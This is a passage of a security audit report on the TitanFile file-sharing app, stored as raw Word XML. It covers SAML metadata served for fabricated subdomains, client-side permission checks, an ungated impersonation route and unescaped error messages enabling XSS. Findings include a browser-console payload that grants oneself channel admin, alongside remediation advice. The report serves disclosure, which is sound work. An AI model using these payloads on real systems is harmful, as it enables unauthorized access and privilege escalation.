        <w:t xml:space="preserve">  &lt;SPSSODescriptor AuthnRequestsSigned="false" WantAssertionsSigned="true"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;AssertionConsumerService</w:t>
        <w:br/>
        <w:t xml:space="preserve">      Location="https://attacker-controlled-999.titanfile.com/saml2/acs/" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/SPSSODescriptor&gt;</w:t>
        <w:br/>
        <w:t>&lt;/EntityDescriptor&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://attacker-controlled-999.titanfile.com/saml2/metadata/"</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;?xml version='1.0' encoding='UTF-8'?&gt;</w:t>
        <w:br/>
        <w:t>&lt;EntityDescriptor entityID="https://attacker-controlled-999.titanfile.com/saml2/metadata/"</w:t>
        <w:br/>
        <w:t xml:space="preserve">                  validUntil=""&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;SPSSODescriptor AuthnRequestsSigned="false" WantAssertionsSigned="true"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;AssertionConsumerService</w:t>
        <w:br/>
        <w:t xml:space="preserve">      Location="https://attacker-controlled-999.titanfile.com/saml2/acs/" /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/SPSSODescriptor&gt;</w:t>
        <w:br/>
        <w:t>&lt;/EntityDescriptor&gt;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AuthnRequest signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AuthnRequestsSigned="true"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AuthnRequestsSigned="false"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Metadata validity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reasonable expiration date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>validUntil="" (never expires)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SAML metadata access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Only configured tenant subdomains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Any fabricated subdomain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.5)</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Sign SAML AuthnRequests (AuthnRequestsSigned="true")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Set valid validUntil date on metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</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Return 404 for SAML metadata on unconfigured subdomains</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Change Gowling WLG CA IdP URL to HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-345 — https://cwe.mitre.org/data/definitions/345.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP SAML Security Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/SAML_Security_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-008: Client-Side Enforcement of Server-Side Permission Model Enabling Privilege Escalation</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7.2 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N)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CWE-602 (Client-Side Enforcement of Server-Side Security)</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A01:2021 — Broken Access Control</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https://app.titanfile.com/static/js/channels/views.js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Channel permission assignment, channel options</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Permission values (is_admin, allow_upload, allow_download) are determined entirely client-side and sent as parameters in socket emissions. This pattern repeats at 4 locations in channels/views.js (lines 550, 748, 924, 1102). Additionally, registrationless_force_password enforcement (requiring passwords on open-access channels) is purely client-side UI logic. The channels:updateoptions socket event sends all security-critical options in a single call.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>// channels/views.js (Lines 550-551, repeated at 748, 924, 1102)</w:t>
        <w:br/>
        <w:t>contact_args['is_admin'] = ['is-admin'].indexOf(privs) &gt; -1;</w:t>
        <w:br/>
        <w:t>contact_args['allow_upload'] = ['is-admin', 'allow-upload'].indexOf(privs) &gt; -1;</w:t>
        <w:br/>
        <w:t>contact_args['allow_download'] = ['is-admin', 'allow-upload', 'allow-download'].indexOf(privs) &gt; -1;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Client-side password enforcement:</w:t>
        <w:br/>
        <w:t>$('#password_required').prop('disabled', true);  // UI-only!</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In browser console — grant self admin on any channel:</w:t>
        <w:br/>
        <w:t>socket.emit('channels:editcontact', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  channel: 'TARGET_CHANNEL_ID',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  contact: MY_CONTACT_ID,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  is_admin: true,          // Overridden</w:t>
        <w:br/>
        <w:t xml:space="preserve">  allow_upload: true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  allow_download: true</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>// In browser console — grant self admin on any channel:</w:t>
        <w:br/>
        <w:t>socket.emit('channels:editcontact', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  channel: 'TARGET_CHANNEL_ID',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  contact: MY_CONTACT_ID,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  is_admin: true,          // Overridden</w:t>
        <w:br/>
        <w:t xml:space="preserve">  allow_upload: true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  allow_download: true</w:t>
        <w:br/>
        <w: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Permission assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server determines permissions based on role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client sends is_admin/allow_upload values; server may trust them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Password enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server requires password for open-access channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client-side UI disabling only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.2)</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Server-side must independently determine permissions based on authenticated user's role</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Validate channel options against subscription feature entitlements server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-602: Client-Side Enforcement of Server-Side Security — https://cwe.mitre.org/data/definitions/602.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-009: Missing Authorization on User Impersonation Management Interface</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7.0 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N)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CWE-862 (Missing Authorization)</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A01:2021 — Broken Access Control</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https://app.titanfile.com/settings/user-impersonation/</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settings/routes.tsx — React Router configuration</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user impersonation management route is rendered unconditionally in settings/routes.tsx (line 158) without any client-side permission check. In contrast, the roles management route has a utils.checkPermission() gate (line 52). If the server-side API similarly lacks authorization, any authenticated user could access the impersonation interface. Additionally, 2FA scratch codes are accessible via /settings/users/:id/2fa/scratchcodes with user ID in the URL (IDOR risk).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>// settings/routes.tsx (Line 158) — NO permission check:</w:t>
        <w:br/>
        <w:t>&lt;Route path="user-impersonation/*" element={&lt;ImpersonationManagement /&gt;} /&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Compare with roles route (Line 52) — HAS permission check:</w:t>
        <w:br/>
        <w:t>const rolesRoutes = utils.checkPermission(["tf_permissions.tf_view_roles_management"]) ? (</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;Route path="roles" .../&gt;</w:t>
        <w:br/>
        <w:t>) : null;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// 2FA scratch codes (Line 73) — user ID in URL:</w:t>
        <w:br/>
        <w:t>&lt;Route path=":id/2fa/scratchcodes"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;Route index element={&lt;TwoFactorScratchCodes /&gt;} /&gt;</w:t>
        <w:br/>
        <w:t>&lt;/Route&gt;</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curl -s "https://app.titanfile.com/static/js/settings/routes.tsx" | grep -n "impersonation\|checkPermission"</w:t>
        <w:br/>
        <w:t>40:import ImpersonationManagement from '../settings/member-impersonation/member-impersonation.tsx';</w:t>
        <w:br/>
        <w:t>52:    const rolesRoutes = utils.checkPermission(["tf_permissions.tf_view_roles_management"]) ? (</w:t>
        <w:br/>
        <w:t>158:   &lt;Route path="user-impersonation/*" element={&lt;ImpersonationManagement /&gt;} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/settings/routes.tsx" | grep -n "impersonation\|checkPermission"</w:t>
        <w:br/>
        <w:t>40:import ImpersonationManagement from '../settings/member-impersonation/member-impersonation.tsx';</w:t>
        <w:br/>
        <w:t>52:    const rolesRoutes = utils.checkPermission(["tf_permissions.tf_view_roles_management"]) ? (</w:t>
        <w:br/>
        <w:t>158:   &lt;Route path="user-impersonation/*" element={&lt;ImpersonationManagement /&gt;} /&gt;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Impersonation route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protected by checkPermission() like roles route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rendered unconditionally — no permission gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2FA scratch codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin-only access validated server-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User ID in URL; client has no ownership check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.0)</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Add utils.checkPermission(["tf_permissions.tf_impersonate_users"]) gate on impersonation route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server-side: validate admin permissions for all impersonation API calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</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Server-side: validate admin access for 2FA scratch code endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-862: Missing Authorization — https://cwe.mitre.org/data/definitions/862.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-010: Unescaped Server Error Messages Enabling Reflected DOM-Based XSS</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7.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)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CWE-79 (Cross-site Scripting)</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A03:2021 — Injection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channels/views.js, views/header.js, notifications/views.js, views/credeon_password.js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Error message rendering across multiple view components</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Server error messages are injected directly into the DOM without escaping across multiple files. In channels/views.js:1638, raw error strings are inserted via jQuery .append(). In credeon_password.js, window.location.pathname is injected into HTML with html:true flag explicitly enabling HTML rendering. The codebase already has utils.escapeHTML() which is used correctly in some places (breadcrumbs) but not in error handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>// channels/views.js:1638 — raw error in .append()</w:t>
        <w:br/>
        <w:t>searchInfo.empty().append('&lt;span class="error"&gt;' + error + '&lt;/span&gt;');</w:t>
        <w:br/>
        <w:br/>
        <w:t>// views/credeon_password.js — html:true with pathname injection</w:t>
        <w:br/>
        <w:t xml:space="preserve">TitanFile.alert('error', '...logged out...' + ' &lt;a href="/login/?next=' </w:t>
        <w:br/>
        <w:t xml:space="preserve">  + window.location.pathname + '"&gt;...', { html: true });</w:t>
        <w:br/>
        <w:br/>
        <w:t>// views/header.js — error concatenation</w:t>
        <w:br/>
        <w:t>TitanFile.alert('error', 'Unable to create channel' + ': ' + err);</w:t>
        <w:br/>
        <w:br/>
        <w:t>// notifications/views.js — response concatenation</w:t>
        <w:br/>
        <w:t>TitanFile.alert('error', 'Failed to retrieve notices: ' + response);</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curl -s "https://app.titanfile.com/static/js/channels/views.js" | grep -n "error.*&lt;/span&gt;"</w:t>
        <w:br/>
        <w:t>1638:  '&lt;span class="error"&gt;' + error + '&lt;/span&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/channels/views.js" | grep -n "error.*&lt;/span&gt;"</w:t>
        <w:br/>
        <w:t>1638:  '&lt;span class="error"&gt;' + error + '&lt;/span&gt;'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Error message rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTML-encoded via utils.escapeHTML() before insertion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Raw HTML concatenated into DOM via .append()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Alert rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
